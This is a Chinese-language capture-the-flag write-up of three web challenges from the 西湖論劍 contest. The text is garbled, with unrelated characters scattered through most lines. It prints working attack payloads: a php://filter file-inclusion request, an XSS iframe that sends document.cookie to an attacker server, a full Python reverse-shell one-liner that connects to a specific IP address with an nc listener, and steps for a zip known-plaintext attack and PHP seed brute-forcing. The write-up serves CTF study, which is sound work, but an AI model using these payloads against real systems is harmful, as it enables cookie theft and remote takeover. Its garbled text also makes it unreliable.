西湖論劍 -web
1、babyt3
頁面中出現(xiàn)include $_GET['file']属划,查看源代碼雀哨,在最后發(fā)現(xiàn)<!--hint: ZGlyLnBocA== -->
base64解碼為dir.php
先利用文件包含讀取index.php和dir.php文件
構(gòu)造?????file=php://filter/read=convert.base64-encode/resource=index.php
得到index.php
得到dir.php
dir.php可以讀取文件名埋凯、目錄
看到flag锅减,再利用index.php讀取flag文件即可
構(gòu)造注意路徑/???file=php://filter/read=convert.base64-encode/resource=/ffffflag_1s_Her4
2、breakout
參考wp:http://www.reibang.com/p/13025b096f23
xss
<iframe src="javascript:window.location.href='http://xxxx:8000/?a='+document.cookie"
可能是服務(wù)器的原因甚亭,我目前只能彈到自己的cookie
得到管理員cookie后贷币,
反彈shell
先在自己的服務(wù)器
$ nc -lvvp 8000
在命令執(zhí)行處
command=python -c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("118.25.89.91",8000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'&exec=1
反彈shell成功后,flag.txt在根目錄下亏狰。
3役纹、猜猜flag是什么
方法一:掃描發(fā)現(xiàn)ds_store泄露
ds_store還原得到
方法二:
發(fā)現(xiàn)存在xss過濾了<>
于是想到url二次編碼過濾,成功給了提示
經(jīng)過各種嘗試骚揍,發(fā)現(xiàn)直接加在url后訪問即可字管。
繼續(xù)掃描目錄,http://61.164.47.198:10002/e10adc3949ba59abbe56e057f20f883e/
訪問github下載壓縮包信不,
感覺index.php和lengzhu.png是讓我們用來明文攻擊的嘲叔。。
使用明文攻擊抽活,
得到code硫戈,
seed.txt是php偽隨機(jī)數(shù)爆破,
執(zhí)行:time ./php_mt_seed 2005214034 后面發(fā)現(xiàn)code會隨時間刷新下硕,所以下面不一樣了
訪問http://61.164.47.198:10002/flag/701439.txt
得到flag
